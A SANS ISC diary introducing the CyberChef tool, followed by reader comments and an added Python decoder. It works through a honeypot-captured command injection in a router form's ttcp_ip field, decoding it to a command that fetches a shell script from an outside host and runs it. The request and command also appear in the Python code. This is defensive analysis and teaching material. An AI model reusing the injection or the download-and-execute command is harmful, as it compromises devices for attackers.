SANS ISC: CyberChef a Must Have Tool in your Tool bag! - SANS Internet Storm Center SANS ISC InfoSec Forums
CyberChef a Must Have Tool in your Tool bag!

This multipurpose and feature-rich tool has been available for a while now and is updated regularly. What I find most interesting is the number of features available in this tool.

CyberChef is fully portable and can be downloaded locally as a simple, self-contained HTML page that runs in any browser; if you prefer, you can download the package from GitHub and compile it yourself[2], but why bother. Since the code is updated regularly, I find the first option more practical. It contains a large number of Operations such as Encoding/Decoding, Logical Operations, Extractors and Hashing, to name a few. Note that each of these Operations expands into a large subset of tools. The complete list of Operations was shown in a screenshot that is not reproduced in this text.

For example, take this URL-encoded (percent-encoded hex) data stream that I captured today in my honeypot:

submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%64%6F%6D%73%74%61%74%65%73%2E%73%75%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1

First, copy the data from '%63%64[...]%73%68' and do a search and replace to remove the percent (%) signs from the data, because CyberChef doesn't have an option to ignore the percent sign. Paste the result into the Input box and select From Hex to see the human-readable text:

6364202F746D703B726D202D66206E6D6C74312E73683B77676574202D4F206E6D6C74312E736820687474703A2F2F646F6D7374617465732E73752F6E6D6C74312E73683B63686D6F64202B78206E6D6C74312E73683B2E2F6E6D6C74312E7368

The human-readable form translates to:

cd /tmp;rm -f nmlt1.sh;wget -O nmlt1.sh http://domstates.su/nmlt1.sh;chmod +x nmlt1.sh;./nmlt1.sh

If you have been looking for a multipurpose tool, this is the one. Give it a try!

[1] https://gchq.github.io/CyberChef/
[2] https://github.com/gchq/CyberChef
[3] https://encoder.secapps.com/

-----------
Guy Bruneau IPSS Inc.
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

Guy, ISC Handler (409 Posts)
CyberChef can handle the removal of the '%' characters for you, and it highlights the beauty of getting to string together operations. There's an operation called "Find/Replace". Add that first, with the options Find on regex with only the % character in there, leave the replace field blank, and make sure global match is checked. Then drag in the "to hex" option.
Anonymous
Or better yet, use the URL Decode function, no find/replace necessary! Thanks for the article, Guy! This is a very useful tool!
Anonymous
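The diary's manual workflow (strip the percent signs, then From Hex) and the commenters' shortcut (a proper URL Decode) both recover the same command from the honeypot capture, but they are not equivalent in general. The following is an added example, not code from the diary or from the CyberChef project; it uses only the Python standard library, the function names (`percent_strip_from_hex`, `url_decode`, `extract_backticked`, `decode_capture`) are hypothetical, and the request body is a constructed copy of the one quoted above. It decodes the capture both ways, shows which form field carried the backtick injection, and rejects the strip-and-From-Hex path when the input mixes literal characters with `%XX` escapes, the case where only a real percent-decoder gives a correct answer.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed copy of the honeypot request body quoted in the diary.
CAPTURED_BODY = (
    "submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `"
    "%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74"
    "%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%64%6F%6D%73%74%61%74"
    "%65%73%2E%73%75%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C"
    "%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1"
)

# The decoded command the diary arrives at, used here to check both decoders.
EXPECTED_COMMAND = ("cd /tmp;rm -f nmlt1.sh;wget -O nmlt1.sh "
                    "http://domstates.su/nmlt1.sh;chmod +x nmlt1.sh;./nmlt1.sh")


def percent_strip_from_hex(encoded: str) -> str:
    """The diary's manual workflow: delete every '%' and feed the rest to 'From Hex'.

    This is only sound when every byte is written as %XX. If the input mixes
    literal characters with escapes (e.g. 'cd%20/tmp'), the stripped string is
    no longer pure hex, so refuse rather than silently produce garbage.
    """
    stripped = encoded.replace("%", "")
    if len(stripped) % 2 or not re.fullmatch(r"[0-9A-Fa-f]*", stripped):
        raise ValueError("input mixes literal characters with %XX escapes; use url_decode()")
    return bytes.fromhex(stripped).decode("latin-1")


def url_decode(encoded: str) -> str:
    """The commenters' workflow: a real percent-decoder (CyberChef's 'URL Decode')."""
    return unquote(encoded)


def extract_backticked(value: str) -> list:
    """Return every backtick-wrapped segment, i.e. candidate shell command substitutions."""
    return re.findall(r"`([^`]*)`", value)


def decode_capture(body: str) -> dict:
    """Parse the form body; map each parameter carrying a backtick injection to its decoded command."""
    fields = dict(parse_qsl(body, keep_blank_values=True))  # parse_qsl percent-decodes values
    findings = {}
    for name, value in fields.items():
        for command in extract_backticked(value):
            findings[name] = command
    return findings


if __name__ == "__main__":
    segment = extract_backticked(CAPTURED_BODY)[0]  # raw %XX text between the backticks
    print("strip + From Hex :", percent_strip_from_hex(segment))
    print("URL Decode       :", url_decode(segment))
    print("injected field(s):", decode_capture(CAPTURED_BODY))
```

Both decoders agree on this capture because the attacker encoded every byte. `decode_capture` goes one step further than the diary by parsing the whole body, which shows the injection lives in the `ttcp_ip` parameter rather than leaving the analyst to locate it by eye.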
